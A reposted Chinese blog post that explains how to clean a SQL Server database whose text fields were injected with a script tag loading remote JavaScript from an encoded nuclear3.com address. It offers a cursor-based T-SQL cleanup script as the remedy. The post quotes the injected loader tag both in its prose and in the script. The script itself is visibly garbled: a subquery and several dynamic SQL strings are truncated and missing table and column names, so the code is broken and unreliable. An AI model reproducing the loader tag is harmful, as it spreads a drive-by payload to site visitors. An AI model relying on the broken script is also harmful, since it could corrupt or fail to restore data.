關于注入

< DOCTYPE html PUBLIC -WCDTD XHTML StrictEN httpwwwworgTRxhtmlDTDxhtml-strictdtd>

這幾天朋友的網站天天被搞破壞的人惡意注入，也許是程式沒寫好的原因，資料庫每個字段加了一段script（<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>，而這個script位址時不時的有變化）。因為這個朋友最怕資料丢失，希望恢複資料，于是我就幫他寫了一個清理字段的sql腳本。呵，以後自己也可以用到。

    declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)

    set @injectSql='<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>'

          DECLARE curLabel CURSOR FOR select name from sysobjects where xtype='U'

          OPEN curLabel

          FETCH NEXT FROM curLabel INTO @name

          WHILE @@FETCH_STATUS = 0

          BEGIN

    DECLARE curLabel1 CURSOR FOR SELECT Column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE (TABLE_NAME = @name)

    OPEN curLabel1

    FETCH NEXT FROM curLabel1 INTO @columnName,@columnType

    WHILE @@FETCH_STATUS = 0

    BEGIN

     if((@columnType='text' or @columnType='ntext'))

      --print 1

      BEGIN TRY

       declare @primaryKey nvarchar(255);

       SELECT @primaryKey=primaryKey from

       (select

        c.name as primaryKey,

        case when c.colid in(select ik.colid

        from sysindexes i, Sysindexkeys ik, sysobjects oo

        where i.id=ik.id and i.indid=ik.indid

         and i.name=oo.name and oo.xtype='PK' --主鍵

         and o.id=i.id

        ) then 1 else 0 end isPrimaryKey

        from sysobjects o inner join syscolumns c on o.id=c.id

        where o.xtype='U'

        and ) as t where isPrimaryKey=1

       exec('declare @ptr varbinary(16);declare @id nvarchar(16);declare curText scroll Cursor for select textptr( from @Position int,@len int;OPEN curText;FETCH NEXT FROM curText INTO @ptr,@id;WHILE @@FETCH_STATUS=0 BEGIN;select @Position=patindex() from where @Position>0 begin;set @Position=@Position-1;updatetext @ptr @Position @len '''';select @Position=patindex() from where NEXT FROM curText INTO @ptr,@id;END;CLOSE curText;DEALLOCATE curText')

      END TRY

      BEGIN CATCH

       print(@name+'.'+@columnName)

      END CATCH;

     else

      if(@columnType='nvarchar' or @columnType='varchar')

      exec('update set )

    END

    CLOSE curLabel1

    DEALLOCATE curLabel1

          END

          CLOSE curLabel

          DEALLOCATE curLabel

<a href="http://www.cnblogs.com/tag/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8A%80%E6%9C%AF/feeds">#資料庫技術</a>

本文轉自 netcorner 部落格園部落格，原文連結：http://www.cnblogs.com/netcorner/archive/2008/12/06/2912095.html   ，如需轉載請自行聯系原作者